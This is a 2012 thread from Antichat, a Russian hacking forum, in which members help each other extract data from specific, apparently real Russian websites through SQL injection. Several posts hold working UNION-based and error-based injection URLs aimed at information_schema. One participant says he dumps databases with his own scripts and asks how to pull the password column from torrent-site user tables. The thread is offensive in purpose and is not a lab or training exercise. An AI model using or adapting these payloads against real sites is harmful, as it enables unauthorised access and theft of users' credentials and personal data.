ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.03.2012, 00:53
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от qaz
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?
Все выводиться, WHERE убери =\
|
|
|
25.03.2012, 00:54
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от qaz
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?
После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+
|
|
|
|
25.03.2012, 03:12
|
|
Познающий
Регистрация: 12.03.2012
Сообщений: 40
Провел на форуме:
13805
Репутация:
0
|
|
А на мой вопрос кто нибудь ответит?
|
|
|
|
25.03.2012, 03:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Facecontrol
А на мой вопрос кто нибудь ответит?
для кого это тема?
там море ссылок
|
|
|
|
25.03.2012, 08:37
|
|
Новичок
Регистрация: 29.09.2010
Сообщений: 21
Провел на форуме:
8271
Репутация:
0
|
|
http://site.com/about.php?page='
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 1[SELECT namemap.info_hash as hash, namemap.filename, namemap.url, namemap.poster, namemap.data, categories.name as cname, namemap.category as catid FROM namemap LEFT JOIN categories ON categories.id = namemap.category WHERE namemap.status=1 ORDER BY data DESC LIMIT -20, 20]
Is that sql vuln ?
Well, for now I don't want to post link over the internet, but can you help me a little to find the tables ? I tried so many of ways but can't get working method...
My tries:
Код:
http://site.com/about.php?page=')+order+by+13--+-
http://site.com/about.php?page='+order+by+13--+-
http://site.com/about.php?page=' order by 13
But there is no change...
Any ideas ?
BTW I'm sorry about the language, but if I use google translate, would be awful for all of us... |
|
|
|
25.03.2012, 08:38
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Yes, this is sql-injection, but in LIMIT. You can't exploit this vuln.
|
|
|
|
25.03.2012, 08:40
|
|
Новичок
Регистрация: 29.09.2010
Сообщений: 21
Провел на форуме:
8271
Репутация:
0
|
|
Sad face
Thanks for the info
|
|
|
|
25.03.2012, 13:10
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Tigger
Все выводиться, WHERE убери =\
та то я нечаёно оставил, забыл вытереть прежде чем запостить
Сообщение от winstrool
После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+
да и так пробовал, вабще колонки выводить нехочет
|
|
|
|
25.03.2012, 13:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от qaz
та то я нечаёно оставил, забыл вытереть прежде чем запостить
да и так пробовал, вабще колонки выводить нехочет
Не понимаю почему у вас не получается, вот вам вывод, взял из случайной таблици: INNODB_CMP_RESET где ее хекс значение равняется 494e4e4f44425f434d505f5245534554
_http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,group_concat(column_name),13,14, 15,16,17,18,19,20,21+from+information_schema.colum ns+where+table_name=0x494e4e4f44425f434d505f524553 4554+limit+0,1--+
|
|
|
|
25.03.2012, 17:03
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
такс, тут ещо проблема
http://torrnado.ru/peerlist.php?id=982+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+column_name+from+in formation_schema.columns+where+table_name=0x706870 62625f7573657273+limit+19000,1%29,0x00,floor%28ran d%280%29*2%29%29x+from+information_schema.tables+g roup+by+x%29a%29--+
таблици вывело нормально
отсюда torrent:xbt_users:1567810 нехочет выводить кольнку pass(не могу поверить что она пустая)
и
нхочет вобще выводить колонки и инфу из torrenthpbb_users:1551912
ну пустой она быть нможет так как там всётак есть форум с юзерами)) как мн ето всё вывести?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
